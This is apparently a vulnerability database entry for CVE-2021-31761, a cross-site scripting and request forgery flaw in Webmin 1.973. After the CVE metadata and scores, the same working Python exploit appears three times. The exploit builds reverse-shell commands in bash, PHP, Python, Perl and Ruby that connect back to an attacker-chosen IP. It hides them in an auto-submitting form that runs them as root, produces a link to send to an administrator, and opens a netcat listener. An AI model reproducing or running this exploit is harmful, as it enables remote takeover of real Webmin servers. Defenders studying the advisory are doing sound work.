CVE-2021-31761

2021-04-25T19:15:00

Description

Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.

Affected Software

CPE Name	Name	Version
webmin:webmin	webmin	1.973

{"id": "CVE-2021-31761", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-31761", "description": "Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature.", "published": "2021-04-25T19:15:00", "modified": "2021-12-08T20:26:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 2.8, "impactScore": 6.0}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31761", "reporter": "cve@mitre.org", "references": ["https://youtu.be/23VvUMu-28c", "https://github.com/electronicbots/CVE-2021-31761", "https://github.com/Mesh3l911/CVE-2021-31761", "https://github.com/webmin/webmin", "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html"], "cvelist": ["CVE-2021-31761"], "immutableFields": [], "lastseen": "2022-03-23T18:08:01", "viewCount": 63, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB", "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}], "rev": 4}, "score": {"value": 3.5, "vector": "NONE"}, "twitter": {"counter": 6, "modified": "2021-04-29T09:46:37", "tweets": [{"link": "https://twitter.com/WolfgangSesin/status/1387445279952080897", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/9r7dQ32z5h?amp=1"}, {"link": "https://twitter.com/WolfgangSesin/status/1387445279952080897", "text": "New post from https://t.co/uXvPWJy6tj?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/9r7dQ32z5h?amp=1"}, {"link": "https://twitter.com/FortifiedITLtd/status/1388116283259080705", "text": "CVE-2021-31761\nWebmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature."}, {"link": "https://twitter.com/threatintelctr/status/1417522371871838211", "text": " NEW: CVE-2021-31761 Webmin 1.973 is affected by reflected Cross Site Scripting (XSS) to achieve Remote Command Execution through Webmin's running process feature. Severity: CRITICAL https://t.co/F5V7BTUfSv?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1387445287086555136", "text": "New post from https://t.co/9KYxtdHHVL?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/Gp0SoTa7tL?amp=1"}, {"link": "https://twitter.com/www_sesin_at/status/1387445287086555136", "text": "New post from https://t.co/9KYxtdHHVL?amp=1 (CVE-2021-31761 (webmin)) has been published on https://t.co/Gp0SoTa7tL?amp=1"}]}, "backreferences": {"references": [{"type": "canvas", "idList": ["WEBMIN"]}, {"type": "exploitdb", "idList": ["EDB-ID:50144"]}, {"type": "githubexploit", "idList": ["80853E7D-3590-5E87-AD43-378E0461B3EB", "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163559"]}, {"type": "zdt", "idList": ["1337DAY-ID-36572"]}]}, "exploitation": null, "vulnersScore": 3.5}, "_state": {"dependencies": 0, "score": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:webmin:webmin:1.973"], "cpe23": ["cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*"], "cwe": ["CWE-79"], "affectedSoftware": [{"cpeName": "webmin:webmin", "version": "1.973", "operator": "eq", "name": "webmin"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:webmin:webmin:1.973:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://youtu.be/23VvUMu-28c", "name": "https://youtu.be/23VvUMu-28c", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/electronicbots/CVE-2021-31761", "name": "https://github.com/electronicbots/CVE-2021-31761", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/Mesh3l911/CVE-2021-31761", "name": "https://github.com/Mesh3l911/CVE-2021-31761", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/webmin/webmin", "name": "https://github.com/webmin/webmin", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "name": "http://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"packetstorm": [{"lastseen": "2021-07-20T17:19:32", "description": "", "cvss3": {}, "published": "2021-07-20T00:00:00", "type": "packetstorm", "title": "Webmin 1.973 Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "PACKETSTORM:163559", "href": "https://packetstormsecurity.com/files/163559/Webmin-1.973-Cross-Site-Request-Forgery.html", "sourceData": "`# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF) \n# Date: 24/04/2021 \n# Exploit Author: Mesh3l_911 & Z0ldyck \n# Vendor Homepage: https://www.webmin.com \n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761 \n# Version: Webmin 1.973 \n# Tested on: All versions <= 1.973 \n# CVE: CVE-2021-31761 \n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to \n# get a Remote Command Execution (RCE) through the Webmin's running process \n# feature \n \nimport time, subprocess,random,urllib.parse \n \n \nprint('''\\033[1;37m \n \n__ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __ \n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ / \n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/ \n__/ | \n|___/ \n \n\\033[1;m''') \n \nfor i in range(101): \nprint( \n\"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format( \ni), \"\\033[1;36m%\\033[1;m\", end=\"\") \ntime.sleep(0.02) \nprint(\"\\n\\n\") \n \ntarget = input( \n\"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\") \n \nif target.endswith('/'): \ntarget = target + 'tunnel/link.cgi/' \nelse: \ntarget = target + '/tunnel/link.cgi/' \n \nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\") \n \nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\") \n \nReverseShell = input \\ \n('''\\033[1;37m \n\\n \n1- Bash Reverse Shell \\n \n2- PHP Reverse Shell \\n \n3- Python Reverse Shell \\n \n4- Perl Reverse Shell \\n \n5- Ruby Reverse Shell \\n \n\\033[1;m \n \n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''') \n \nfile_name = random.randrange(1000) \n \nif ReverseShell == '1': \nReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+'' \n \nelif ReverseShell == '2': \nReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' ''' \n \nelif ReverseShell == '3': \nReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' ''' \n \nelif ReverseShell == '4': \nReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' ''' \n \nelif ReverseShell == '5': \nReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' ''' \n \nelse: \nprint(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\") \n \n \ndef CSRF_Generator(): \nPayload = urllib.parse.quote(''' \n \n<html> \n<head> \n<meta name=\"referrer\" content=\"never\"> \n</head> \n<body> \n<script>history.pushState('', '', '/')</script> \n<form action=\"/proc/run.cgi\" method=\"POST\"> \n<input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" /> \n<input type=\"hidden\" name=\"mode\" value=\"0\" /> \n<input type=\"hidden\" name=\"user\" value=\"root\" /> \n<input type=\"hidden\" name=\"input\" value=\"\" /> \n<input type=\"hidden\" name=\"undefined\" value=\"\" /> \n<input type=\"submit\" value=\"Submit request\" /> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n \n</html> \n \n''') \n \nprint(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\") \n \nprint(target+Payload) \n \ndef Netcat_listener(): \nprint() \nsubprocess.run([\"nc\", \"-nlvp \"+port+\"\"]) \n \n \ndef main(): \nCSRF_Generator() \nNetcat_listener() \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163559/webmin1973-xsrfexec.txt", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2021-12-15T15:38:34", "description": "# CVE-2021-31761\n\n# Description :\n<b>Exploiting a Reflected Cros...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T20:00:09", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-12-15T14:41:56", "id": "80853E7D-3590-5E87-AD43-378E0461B3EB", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:21:33", "description": "# ..| CVE-2021-31761 |..\n\n# Description :\n<b>Exploiting a Reflec...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T19:46:43", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Webmin", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-06-20T03:50:26", "id": "DEAFBFA5-F25C-5046-9615-A5F337FCF2E7", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2021-12-04T15:52:23", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "zdt", "title": "Webmin 1.973 - (run.cgi) Cross-Site Request Forgery Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "1337DAY-ID-36572", "href": "https://0day.today/exploit/description/36572", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\n# Exploit Author: Mesh3l_911 & Z0ldyck\n# Vendor Homepage: https://www.webmin.com\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\n# Version: Webmin 1.973\n# Tested on: All versions <= 1.973\n# CVE: CVE-2021-31761\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\n# get a Remote Command Execution (RCE) through the Webmin's running process\n# feature\n\nimport time, subprocess,random,urllib.parse\n\n\nprint('''\\033[1;37m\n\n __ __ _ ____ _ _________ _ _ _ \n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\n __/ | \n |___/ \n\n \\033[1;m''')\n\nfor i in range(101):\n print(\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;[email\u00a0protected]\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\n time.sleep(0.02)\nprint(\"\\n\\n\")\n\ntarget = input(\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\n\nif target.endswith('/'):\n target = target + 'tunnel/link.cgi/'\nelse:\n target = target + '/tunnel/link.cgi/'\n\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\n\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\n\nReverseShell = input \\\n('''\\033[1;37m\n\\n\n1- Bash Reverse Shell \\n\n2- PHP Reverse Shell \\n\n3- Python Reverse Shell \\n\n4- Perl Reverse Shell \\n\n5- Ruby Reverse Shell \\n\n\\033[1;m\n\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''')\n\nfile_name = random.randrange(1000)\n\nif ReverseShell == '1':\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\n\nelif ReverseShell == '2':\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\n\nelif ReverseShell == '3':\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\n\nelif ReverseShell == '4':\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\n\nelif ReverseShell == '5':\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\n\nelse:\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\n\n\ndef CSRF_Generator():\n Payload = urllib.parse.quote('''\n\n<html>\n <head>\n <meta name=\"referrer\" content=\"never\">\n </head>\n <body>\n <script>history.pushState('', '', '/')</script>\n <form action=\"/proc/run.cgi\" method=\"POST\">\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\n <input type=\"hidden\" name=\"user\" value=\"root\" />\n <input type=\"hidden\" name=\"input\" value=\"\" />\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\n <input type=\"submit\" value=\"Submit request\" />\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n\n</html>\n\n ''')\n\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\n\n print(target+Payload)\n\ndef Netcat_listener():\n print()\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\n\n\ndef main():\n CSRF_Generator()\n Netcat_listener()\n\n\nif __name__ == '__main__':\n main()\n", "sourceHref": "https://0day.today/exploit/36572", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:30", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-07-20T00:00:00", "type": "exploitdb", "title": "Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-31761", "CVE-2021-31761"], "modified": "2021-07-20T00:00:00", "id": "EDB-ID:50144", "href": "https://www.exploit-db.com/exploits/50144", "sourceData": "# Exploit Title: Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)\r\n# Date: 24/04/2021\r\n# Exploit Author: Mesh3l_911 & Z0ldyck\r\n# Vendor Homepage: https://www.webmin.com\r\n# Repo Link: https://github.com/Mesh3l911/CVE-2021-31761\r\n# Version: Webmin 1.973\r\n# Tested on: All versions <= 1.973\r\n# CVE: CVE-2021-31761\r\n# Description: Exploiting a Reflected Cross-Site Scripting (XSS) attack to\r\n# get a Remote Command Execution (RCE) through the Webmin's running process\r\n# feature\r\n\r\nimport time, subprocess,random,urllib.parse\r\n\r\n\r\nprint('''\\033[1;37m\r\n\r\n __ __ _ ____ _ _________ _ _ _ \r\n| \\/ | | | |___ \\| | |___ / _ \\| | | | | | \r\n| \\ / | ___ ___| |__ __) | | / / | | | | __| |_ _ ___| | __\r\n| |\\/| |/ _ \\/ __| '_ \\ |__ <| | / /| | | | |/ _` | | | |/ __| |/ /\r\n| | | | __/\\__ \\ | | |___) | | _ _ / /_| |_| | | (_| | |_| | (__| < \r\n|_| |_|\\___||___/_| |_|____/|_| (_|_) /_____\\___/|_|\\__,_|\\__, |\\___|_|\\_/\r\n __/ | \r\n |___/ \r\n\r\n \\033[1;m''')\r\n\r\nfor i in range(101):\r\n print(\r\n \"\\r\\033[1;36m [>] POC By \\033[1;m \\033[1;37mMesh3l\\033[1;m \\033[1;36m ( \\033[1;m\\033[1;37m@Mesh3l_911\\033[1;m\\033[1;36m ) & \\033[1;m \\033[1;37mZ0ldyck\\033[1;m\\033[1;36m ( \\033[1;m\\033[1;37m@electronicbots\\033[1;m\\033[1;36m ) \\033[1;m {} \\033[1;m\".format(\r\n i), \"\\033[1;36m%\\033[1;m\", end=\"\")\r\n time.sleep(0.02)\r\nprint(\"\\n\\n\")\r\n\r\ntarget = input(\r\n \"\\033[1;36m \\n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \\033[1;m\")\r\n\r\nif target.endswith('/'):\r\n target = target + 'tunnel/link.cgi/'\r\nelse:\r\n target = target + '/tunnel/link.cgi/'\r\n\r\nip = input(\"\\033[1;36m \\n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \\033[1;m\")\r\n\r\nport = input(\"\\033[1;36m \\n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \\033[1;m\")\r\n\r\nReverseShell = input \\\r\n('''\\033[1;37m\r\n\\n\r\n1- Bash Reverse Shell \\n\r\n2- PHP Reverse Shell \\n\r\n3- Python Reverse Shell \\n\r\n4- Perl Reverse Shell \\n\r\n5- Ruby Reverse Shell \\n\r\n\\033[1;m\r\n\r\n\\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \\033[1;m''')\r\n\r\nfile_name = random.randrange(1000)\r\n\r\nif ReverseShell == '1':\r\n ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''\r\n\r\nelif ReverseShell == '2':\r\n ReverseShell = ''' php -r '$sock=fsockopen(\"''' + ip + '''\",''' + port + ''');exec(\"/bin/sh -i <&3 >&3 2>&3\");' '''\r\n\r\nelif ReverseShell == '3':\r\n ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"''' + ip + '''\",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);' '''\r\n\r\nelif ReverseShell == '4':\r\n ReverseShell = ''' perl -e 'use Socket;$i=\"''' + ip + '''\";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};' '''\r\n\r\nelif ReverseShell == '5':\r\n ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open(\"''' + ip + '''\",''' + port + ''').to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)' '''\r\n\r\nelse:\r\n print(\"\\033[1;36m \\n Please Re-Check ur input :( \\033[1;m \\n\")\r\n\r\n\r\ndef CSRF_Generator():\r\n Payload = urllib.parse.quote('''\r\n\r\n<html>\r\n <head>\r\n <meta name=\"referrer\" content=\"never\">\r\n </head>\r\n <body>\r\n <script>history.pushState('', '', '/')</script>\r\n <form action=\"/proc/run.cgi\" method=\"POST\">\r\n <input type=\"hidden\" name=\"cmd\" value=\"''' + ReverseShell + '''\" />\r\n <input type=\"hidden\" name=\"mode\" value=\"0\" />\r\n <input type=\"hidden\" name=\"user\" value=\"root\" />\r\n <input type=\"hidden\" name=\"input\" value=\"\" />\r\n <input type=\"hidden\" name=\"undefined\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n <script>\r\n document.forms[0].submit();\r\n </script>\r\n </body>\r\n\r\n</html>\r\n\r\n ''')\r\n\r\n print(\"\\033[1;36m\\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \\n \\n\\033[1;m\")\r\n\r\n print(target+Payload)\r\n\r\ndef Netcat_listener():\r\n print()\r\n subprocess.run([\"nc\", \"-nlvp \"+port+\"\"])\r\n\r\n\r\ndef main():\r\n CSRF_Generator()\r\n Netcat_listener()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50144", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}

CVE-2021-31761

Description

Affected Software

Related